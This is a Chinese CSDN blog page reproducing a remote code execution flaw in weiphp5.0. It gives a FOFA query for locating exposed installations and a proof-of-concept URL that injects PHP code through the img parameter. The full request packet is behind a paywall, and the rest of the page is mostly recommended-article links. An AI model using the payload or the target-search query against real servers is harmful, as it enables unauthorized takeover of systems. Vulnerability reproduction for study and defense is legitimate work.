weiphp5.0存在远程代码执行漏洞

最新推荐文章于 2024-05-20 20:42:03 发布
最新推荐文章于 2024-05-20 20:42:03 发布
阅读量121 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络 网络安全 安全性测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/136633271
版权

@[toc]

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. weiphp5.0简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

weiphp 是一个开源,高效,简洁的微信开发平台

2.漏洞描述

weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

weiphp5.0

weiphp5.0存在远程代码执行漏洞

4.fofa查询语句

body="/css/weiphp.css" || title="weiphp" || title="weiphp4.0"

5.漏洞复现

漏洞链接:http://127.0.0.1/public/index.php/weixin/Notice/index?img=echo+md5(1);exit();

漏洞数据包࿱

了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
weiphp微信公众平台授权设置
10-23
本文给大家分享的是一款开源的微信公众平台weiphp的授权设置教程,非常的实用,有使用weiphp平台的小伙伴可以参考下。
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
08-03
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
weiphp微信公众平台框架 v3.0 正式版
12-10
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。
weiphp框架
01-14
weiphp
weiphp:微信公众平台开源代码2.0
03-24
微信 微信公众平台开源代码2.0
wei php getshell,某开源框架从注入到Getshell
weixin_29294597的博客
04-06 159
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:sjy93812,未经许可禁止转载0x00 前言SemCms是一套开源外贸企业网站管理系统,主要用于外贸企业,兼容IE、Firefox 等主流浏览器。SemCms使用vbscript语言编写,结合iis运行。采用国际通用utf-8编码编写。SemCms非常适合在外贸企...
wei php getshell,海洋cms最新版前台getshell(附靶机)
weixin_30587041的博客
04-06 488
cms版本:6.45官网好像是6.48版本了直接上代码[mw_shl_code=applescript,true]function parseIf($content){if (strpos($content,'{if:')=== false){return $content;}else{$labelRule = buildregx("{if.*?)}(.*?){end if}","is");$la...
WeiPHP5.0远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-12 638
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
weixin_34314962的博客
12-11 4084
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...
THINKPHP5 getshell
公众号shadow sock7
12-11 7795
参考: https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQ https://www.anquanke.com/post/id/167653 http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用(getshell)/ ...
漏洞复现】weiphp index.php 远程代码执行漏洞
qq_67810151的博客
03-12 490
weiphp5.0 存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞进入远程代码执行,从而控制服务器。
[代码审计]Weiphp5.0 前台文件任意读取分析
Y4tacker的博客
05-09 1252
文章目录前言分析 前言 最近一直在刷CNVD吧,大概两周刷了四页多,感觉自己水平也在见着长高,今天来分析一下Weiphp,毕竟也很久没写过博客了 分析 漏洞所在的函数为application/material/controller/Material.php下的_download_imgage函数,正好这是一个public方法,根据thinkphp的路由规则我们不难得到传参方式,这里直接先给出exp然后继续分析好吧 http://ddcms.top//public/index.php/material/Ma
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 448
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
curl
csdn_jiangpeng的博客
01-16 202
/** * get * post方式请求资源 * @param string $url 基于的baseUrl * @param int $flag 标志位 * @param array $header 头部 * @return string 返回的资源内容 */ function curl_get($url, $flag = 0, $header = []) {...
Linux网络编程:网络基础
最新发布
weixin_73234157的博客
05-20 493
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 232
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
云服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 547
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多种防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
STORAGE_WRITE_ERROR
07-28
\[3\]如果问题仍然存在,您可以尝试联系程序开发者或者技术支持寻求帮助。 #### 引用[.reference_title] - *1* *2* [ThinkPHP3.2.2报错:_STORAGE_WRITE_ERROR_,_PHP教程]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值